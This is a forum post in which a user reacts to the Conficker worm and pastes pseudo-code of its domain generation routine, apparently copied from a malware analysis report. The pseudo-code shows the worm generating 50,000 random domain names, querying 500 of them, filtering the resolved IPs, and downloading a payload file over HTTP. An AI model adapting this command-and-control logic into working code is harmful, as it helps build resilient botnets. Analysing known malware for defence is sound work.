Nick Granger said:sweet thanks for the info then.
and btw i wasnt trying to like start an arguement or anything out of this haha. i just said what i knew and i never heard anything about it being activated i just heard from everywhere else nothing happened
i feel ya
* note to anyone that thinks this shit is a joke and thinks your safe YOUR NOT
i found code that the conflicker c uses .... this shit is intense (if you understand code)
Below is the domain generation i was talking about where it looks for instructions on websites
i also found code that once conflicker c is infected on your computer it disable all MICRSOFT SECURITY WEAR then happily deletes it
so F U conflicker
int domain_name_generation()
// local declarations
hMem = 0;
hMem = GlobalAlloc(0x40u, 0x30D40u); // global array - 50,000 random names
if ( hMem )
while ( 1 )
counter_domains = counter;
if ( counter >= 50000 )
size_of_name = DGA_random_function() % 6 + 4;
// size of domain name is between 4 and 10 chars
// append "." at the end of the name
random = DGA_random_function();
strcat(domainname, TLD-suffix[random num % 116] );
// append 1 of 116 suffixes (from 110 TLDs) to domain name
// select and query 500 domains
counter_domains = 0;
while ( !success_download && counter_domains < 500 )
// random number modulo 50,000
one_in_50000_names = conficker_D_PRNG_function() % 50,000);
hostent = gethostbyname(one_in_50000_names);
// resolve name to a set of IP addresses
if ( hostent )
host_address = hostent->address_list; // get list of IPs
array_previously_checked_IPs[counter_domains] = host_address;
if ( *host_address )
// skip if domain name resolves to multiple IP addresses
if ( !*(host_address + 1) )
// skip if IP is local host or other trivial IPs
if ( check_IP_value(host_address) )
is_blacklisted_ip = check_if_IP_is_in_ranges(host_address);
// skip if IP is blacklisted
if ( ! is_blacklisted_ip )
found = 0;
index = 0;
while (index < counter_domains )
if (host_address == array_previously_checked_IPs[index] )
found = 1;
break; // break if IP has been previously encountered
// skip if IP has been previously encountered
if ( !found )
snprintf(Dest, 0x80u, "http://%s", host_address);
success_download = download_and_validate_file(Dest);
// HTTP request to the domain and download valid file
Sleep(...); // sleep small random amount
return success_download;
Figure 2: Domain generation pseudo-code